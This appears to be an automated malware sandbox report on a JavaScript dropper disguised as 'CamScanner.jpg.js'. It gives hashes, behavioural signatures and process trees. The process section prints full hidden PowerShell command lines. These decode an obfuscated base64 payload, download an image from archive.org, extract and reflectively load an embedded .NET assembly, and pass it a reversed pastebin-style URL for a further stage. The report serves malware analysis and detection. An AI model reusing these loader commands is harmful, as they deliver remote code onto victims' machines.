Analysis
max time kernel: 17s
max time network: 18s
platform: windows7_x64
resource: win7-20240729-en
resource tags: arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
submitted: 02-08-2024 12:21
Static task: static1
Behavioral task: behavioral1
Sample: CamScanner.jpg.js
Resource: win7-20240729-en
Behavioral task: behavioral2
Sample: CamScanner.jpg.js
Resource: win10v2004-20240730-en
General
Target: CamScanner.jpg.js
Size: 337KB
MD5: 03075353ad7a408cdadc3a28afaf47c0
SHA1: 31af045eaf01e0006a62f3fa2ae6a0244ad1a37c
SHA256: 9738532e30fdd2a36d900eff8a42aa1aa03c9cd328d27da75997976bff647401
SHA512: 0d197c5798a8a7d04583f7d3bfe1fb4e67e546aaf89d0da879c79d5b4735d6a0af766b3da6afd59e894a20a26cfb21dbfb5eb1be6bc063b90c9118bb36c58778
SSDEEP: 768:ZpUOaxGQG8GQGUD1Chty8vzR+0KFiRIxrAwKwN1Sy1h1l1La138V7DnzBhBLszZI:U2XsQ/Cz+rGS5DUtE1vk
Malware Config
Signatures
Blocklisted process makes network request 4 IoCs
flow | pid | Process
3 | 2512 | powershell.exe
4 | 2512 | powershell.exe
5 | 2512 | powershell.exe
6 | 2512 | powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid | Process
2700 | powershell.exe
2512 | powershell.exe

Command and Scripting Interpreter: JavaScript 1 TTPs

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses 2 IoCs
pid | Process
2700 | powershell.exe
2512 | powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs
description | pid | Process
Token: SeDebugPrivilege | 2700 | powershell.exe
Token: SeDebugPrivilege | 2512 | powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs
description | pid | Process | procid_target
PID 2524 wrote to memory of 2700 | 2524 | wscript.exe | 29
PID 2524 wrote to memory of 2700 | 2524 | wscript.exe | 29
PID 2524 wrote to memory of 2700 | 2524 | wscript.exe | 29
PID 2700 wrote to memory of 2512 | 2700 | powershell.exe | 31
PID 2700 wrote to memory of 2512 | 2700 | powershell.exe | 31
PID 2700 wrote to memory of 2512 | 2700 | powershell.exe | 31
Processes
C:\Windows\system32\wscript.exe wscript.exe C:\Users\Admin\AppData\Local\Temp\CamScanner.jpg.js 1⤵
- Suspicious use of WriteProcessMemory
PID:2524
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '…';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo.replace('♺ ⠰ ℁ ⇝ ⾽','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD 2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2700
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://archive.org/download/nativee/nativee.jpg', 'https://archive.org/download/nativee/nativee.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('dnlib.IO.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.1etsap/3lkltbj3/war/ved.edocetsap//:sptth' , '1' , 'C:\ProgramData\' , 'desprezativo','desativado','desativado','','3'))}}" 3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2512
Network
MITRE ATT&CK Enterprise v15
Downloads
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize: 7KB
MD5: 5a7bc6830d316e05571c769a7d345c3e
SHA1: eac4444a04a1942d97d9ea7635e89296b9bd41f0
SHA256: de8fb64eb788cdb5e91930f682ef35396b2ee27379ad9baf98345b5f41b2cd4c
SHA512: bf5ccefaab222a17554dbd15dd45f6cfc35e65cc4527903160d03a803b0a7b8cbaa64c669aa3fd3d854afe377b735a86e69a9ae277f9ecca28bd2a3f5bd2e04d